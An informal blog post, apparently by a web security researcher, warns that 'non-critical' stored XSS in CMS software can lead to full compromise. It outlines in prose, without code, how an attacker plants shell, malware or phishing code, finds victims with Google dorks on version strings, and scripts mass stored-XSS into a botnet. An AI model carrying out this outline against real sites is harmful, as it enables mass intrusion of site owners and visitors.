In "OMG - break"-time I wrote one note for You... ;)
Here it is:
(...)
Hello, once upon a time...
Just kiddin.. not this way. ;]
Ok, so as I wrote few posts ago, there is a funny thing I am doing last weeks.
Various crazy scenario of attacks showed me various things.
From information disclosure bugs to "not presented in public"
(some of them I posted here, some not like XSS in PMA3.4.5 or some sqli-bugs).
When I was searching possibility to 'store codes in applications',
I was looking for 'whats next' or 'how to use it "for real"' ;).
So... "we found this XSS for logged users only". What's next, what's big deal, what's the difference...? :)
Hmmmm, deface-rence? own3d-rence? what-3lse-rence? ;>
"Why of why" this stored code in <add_Your's_CMS_here;)> application "will be" used like this?
Because, attacker who wants Your files/box/etc, will attack You via any possible way.
Any :)
So, please understand it: even only one simple "not critical" hole can make You owned.
Simple way:
1. attacker will create 'new account'. (let's say, there is a bug in comments like this )
2. now attacker is logged in. so if xss is in this part of webapp, he can put his code here.
What code?
- shell
- malware
- phishing
3. Added code is making whole part of other (nexts) attacks,
Ok. Now second thing:
if Your CMS used in internal (companys) networks, Your users are vulnerable too:
1. attacks-to-person - for example secretary, reception, marketing offices (in our company), etc
2. spam vulnerabilities
So, let's go deeper. :)
"How I owned 27 MLN box'xs?" In my imagination only. :)
Reason is simple: I do not break the law.
But there is one thing You should be sure:
someone somewhere is searching for new vulnerabilities in lates products.
Webapps, closed-source soft, whatever.
Now, simple XSS for "normal user" can be used for this:
You found bug in some latest $cms?
Type this version in www.google.com. Got the idea?
So type this version (where vuln You found) @Google + "Powered.by"... ;]
Got it now? ;)
Answer You will see in millions.
"
In a short way: if Your webapp/CMS can be exploited by XSS, then there is no
problem to build botnet (site:powered.by... and write python code to store-XSS and 'search for next target' should tell You the rest).
And that's the whole story. ;)
For testing security, ask here.
No comments:
Post a Comment
What do You think...?